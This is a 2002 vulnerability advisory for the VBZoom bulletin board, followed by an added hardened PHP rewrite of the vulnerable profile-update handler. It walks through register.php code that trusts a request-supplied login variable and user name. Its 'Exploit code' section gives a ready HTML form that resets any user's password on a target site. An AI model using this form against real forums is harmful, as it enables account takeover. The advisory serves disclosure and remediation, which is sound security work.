Name: VBZoom
Version Affected: tested on v1.01; other versions may also be vulnerable
Severity: Critical
Category: Password reset
Vendor URL: http://www.vbzoom.com
Author: hish_hish <hish_hish565@hotmail.com>
Date: disclosed on 28th August 2002, published on 8th Oct 2002

Description
***********

VBZooM is a bulletin board system written in PHP. The problem lies in an SQL query in the file register.php: any user's password can be reset (see Details).

Details
*******

See these few lines from register.php (line numbers are the advisory's own; omitted lines are marked with ":"):

 1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or
 2:     $VBZooMForumCookiesUserName=="deleted"))
 3: {
 4:     include("admin/config.php");
 5:     include("style/style.php");
 6:     Echo"<BR>";
 :
 9:     include("login.php"); // wooow here will catch us, so we want to pass this block.
 :
10:     Exit();
11: }
 :
14: if ($REQUEST_METHOD=="POST")
15: {
16:     if($ChangeProfile==1 And $UserName!="")
17:     {
18:         include("admin/config.php");
19:         $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20:         $Select =mysql_select_db($DBName,$Connect);
 :
24:         $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
            Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
            Icq='$Icq',Hotmail='$Hotmail',
            Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
            Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
            AllowMail='$AllowMail',AllowMessage='$AllowMessage',
            AllowMailCaseMessage='$AllowMailCaseMessage' where UserName='$UserName'";
31:         $Result = mysql_query($Sql);
32:         If ($Result) {
34:             setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35:             setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);

We do not want to execute the block between line 3 and line 11, so we pass values that make the condition of the if statement at line 1 false. The vulnerable SQL statement lies at line 24, inside the block between line 14 and line 35: the only "authentication" guarding it is the cookie variable tested at line 1, and the UserName in the WHERE clause is taken straight from the request.
So we pass valid values to reach the SQL statement, as follows:

- make a <form method="POST" action="register.php"> to enter the block at line 14;
- assign 1 to the variable $ChangeProfile, and set UserName to the victim's user name to reset his password;
- lines 18 - 20: no comment!!
- lines 24 - 35: :)

Exploit code
************

<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>

Fix Information
***************

Contact http://www.vbzoom.com
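The root cause shown in the Details section is that register.php decides who is logged in from a request-supplied variable ($VBZooMForumCookiesUserName) and then updates whichever row the request names in $UserName, so the check at line 1 and the WHERE clause at line 24 can both be chosen by the sender of the form. The following is an added example of how the same profile-update step looks when written defensively; it is not VBZooM's code and is not the vendor's fix. It assumes PHP 7 or later with PDO, a server-side session that only login.php populates after a successful password check, a Member table using the column names from the advisory's UPDATE statement, and a placeholder DSN and credentials in place of the values from admin/config.php.

```php
<?php
// Added example (not VBZooM's code): a hardened profile-update handler for the
// register.php flow quoted in the advisory. Assumptions: PHP 7+ with PDO, a
// session written only by login.php after a successful password check, a
// Member table with the column names seen in the advisory's UPDATE statement,
// and placeholder DSN/credentials instead of admin/config.php.
// Nothing taken from the request (cookies, POST fields, register_globals) is
// used to decide whether the caller is logged in or whose row is updated.

declare(strict_types=1);

session_start();

// 1. Login state comes from the server-side session, never from a cookie or a
//    request variable such as $VBZooMForumCookiesUserName.
function currentUser(): ?string
{
    return isset($_SESSION['user_name']) && $_SESSION['user_name'] !== ''
        ? (string) $_SESSION['user_name']
        : null;
}

// 2. A per-session CSRF token, so a third-party page cannot submit this form
//    on behalf of a logged-in victim (the advisory's exploit is exactly a
//    cross-site POST).
function csrfTokenValid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = (string) ($post['csrf_token'] ?? '');
    return $expected !== '' && hash_equals($expected, $given);
}

// 3. The row being modified is the authenticated account; the request supplies
//    the new profile data but never chooses the UserName in the WHERE clause.
//    Prepared statements keep user input out of the SQL text.
function updateOwnProfile(PDO $db, string $authenticatedUser, array $post): bool
{
    $stmt = $db->prepare(
        'UPDATE Member SET Email = :email, HomePage = :homepage, Signature = :signature'
        . ' WHERE UserName = :username'
    );
    $stmt->bindValue(':email', (string) ($post['Email'] ?? ''));
    $stmt->bindValue(':homepage', (string) ($post['HomePage'] ?? ''));
    $stmt->bindValue(':signature', (string) ($post['Signature'] ?? ''));
    $stmt->bindValue(':username', $authenticatedUser);
    return $stmt->execute();
}

// 4. A password change is a separate, re-authenticated step: the caller must
//    prove knowledge of the current password, and only a hash is stored.
function changeOwnPassword(PDO $db, string $authenticatedUser, string $current, string $new): bool
{
    $stmt = $db->prepare('SELECT Password FROM Member WHERE UserName = :username');
    $stmt->bindValue(':username', $authenticatedUser);
    $stmt->execute();
    $storedHash = $stmt->fetchColumn();
    if ($storedHash === false || !password_verify($current, (string) $storedHash)) {
        return false;
    }
    if (strlen($new) < 8) {
        return false;
    }
    $stmt = $db->prepare('UPDATE Member SET Password = :hash WHERE UserName = :username');
    $stmt->bindValue(':hash', password_hash($new, PASSWORD_DEFAULT));
    $stmt->bindValue(':username', $authenticatedUser);
    return $stmt->execute();
}

// Request handling (the part of register.php the advisory quotes).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && (($_POST['ChangeProfile'] ?? '') === '1')) {
    $user = currentUser();
    if ($user === null) {
        // Not logged in: send to login.php and stop. No extra form field can
        // make execution continue to the UPDATE below.
        header('Location: login.php');
        exit;
    }
    if (!csrfTokenValid($_POST)) {
        http_response_code(403);
        exit('Invalid request token.');
    }

    // Placeholder DSN and credentials; a real deployment reads these from its
    // own configuration, not from anything in the request.
    $db = new PDO('mysql:host=localhost;dbname=vbzoom', 'dbuser', 'dbpass', [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);

    $ok = updateOwnProfile($db, $user, $_POST);
    if ($ok && isset($_POST['CurrentPassword'], $_POST['Password'])) {
        $ok = changeOwnPassword($db, $user, (string) $_POST['CurrentPassword'], (string) $_POST['Password']);
    }
    // The session cookie is the only client-side token; the password is never
    // written to a cookie as lines 34-35 of the original do.
    echo $ok ? 'Profile updated.' : 'Update failed.';
}
```

Three properties of this version close the hole the advisory describes: the identity used in the WHERE clause is read from the session rather than from $UserName, so a request can only ever update its own row; the "am I logged in" decision never touches a request-controlled variable, so there is no block to "pass" by supplying a cookie-named form field; and the password is changed only after the current one is verified, with a hash rather than the plaintext stored and no password copied into a cookie. The CSRF token is the caveat a reviewer would add on top: even with the identity fixed, a logged-in user could otherwise be made to submit this form from another site.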